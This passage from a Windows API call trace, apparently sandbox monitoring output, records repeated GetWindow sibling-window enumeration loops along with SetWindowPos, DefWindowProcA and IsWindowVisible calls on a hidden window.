returned 0x70104 [0057.623] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.623] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.623] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 
[0057.623] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.623] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.623] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.623] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.623] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.623] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.623] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.623] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.623] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.623] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.623] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.623] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.623] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.624] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.624] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.624] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.624] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.624] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.624] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.624] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.624] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.624] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.624] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.624] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.624] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.624] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.624] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.624] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.624] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.624] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.624] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.624] GetWindow (hWnd=0x10164, uCmd=0x2) 
returned 0x10166 [0057.624] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.624] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.624] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.624] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.624] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.624] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.624] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.624] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.624] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.624] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.624] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.624] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.625] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.625] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.625] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.625] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.625] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.625] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.625] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.625] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.625] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.625] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.625] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.625] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.625] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.625] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.625] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.625] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.625] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.625] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.625] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.625] GetWindow 
(hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.625] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.625] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.625] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.625] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.625] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.625] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.625] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.625] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.625] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.625] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.625] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.625] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.626] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.626] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.626] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.626] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.626] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.626] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.626] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.626] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.626] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.626] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.626] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.626] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.626] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.626] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.626] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.626] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.626] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.626] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.626] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 
[0057.626] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.626] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.626] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.626] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.626] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.626] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.626] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.626] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.626] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.627] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.627] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.627] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.627] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.627] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.627] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.627] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.627] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.627] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.627] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.627] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.627] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.627] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.627] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.627] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.627] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.627] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.627] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.627] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.627] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.627] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.627] GetWindow 
(hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.627] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.627] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.627] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.627] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.627] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.627] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.627] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.627] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.627] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.628] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.628] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.628] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.628] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.628] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.628] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.628] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.628] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.628] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.628] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.628] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.628] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.628] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.628] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.628] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.628] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.628] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.628] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.628] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.628] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.628] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.628] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e 
[0057.628] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.628] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.628] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.629] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.629] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.629] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.629] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.629] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.629] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.629] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.629] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.629] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.629] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.629] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.629] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.629] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.629] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.629] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.629] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.629] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.629] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.629] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.629] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.629] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.629] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.629] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.629] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.629] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.630] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.630] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.630] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.630] GetWindow (hWnd=0x1010a, uCmd=0x2) 
returned 0x1010c [0057.630] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.630] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.630] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.630] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.630] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.630] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.630] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.630] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.630] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.630] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.630] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.630] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.630] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.630] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.630] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.630] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.630] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.630] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.630] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.630] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.630] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.631] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.631] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.631] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.631] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.631] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.631] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.631] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.631] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.631] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.631] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.631] GetWindow 
(hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.631] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.631] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.631] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.631] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.631] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.631] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.631] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.631] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.631] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.631] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.631] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.632] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.632] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.632] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.632] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.632] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.632] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.632] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.632] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.632] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.632] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.632] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.632] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.632] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.632] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.632] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.632] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.632] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.632] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.632] GetWindow 
(hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.632] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.632] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.632] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.632] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.632] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.632] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.632] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.632] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.632] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.632] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.632] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.632] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.632] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.632] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.633] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.633] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.633] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.633] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.633] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.633] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.633] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.633] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.633] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.633] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.633] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.633] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.633] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.633] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.633] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.633] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.633] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.633] 
GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.633] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.633] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.633] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.633] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.633] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.633] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.633] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.633] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.633] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.633] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.633] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.633] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.633] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.634] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.634] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.634] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.634] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.634] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.634] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.634] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.634] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.634] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.634] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.634] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.634] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.634] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.634] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.634] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.634] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.634] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.634] GetWindow (hWnd=0x10130, uCmd=0x2) returned 
0x10122 [0057.634] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.634] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.634] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.634] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.634] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.634] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.634] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.634] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.634] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.634] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.634] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.634] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.634] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.634] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.635] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.635] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.635] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.635] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.635] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.635] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.635] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.635] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.635] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.635] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.635] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.635] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.635] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.635] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.635] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.635] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.635] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.635] GetWindow (hWnd=0x100f8, 
uCmd=0x2) returned 0x1004c [0057.635] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.635] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.635] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.635] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.635] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.635] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.635] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.635] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.635] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.635] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.635] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.635] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.635] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.636] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.636] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.636] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.636] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.636] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.636] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.636] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.636] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.636] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.636] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 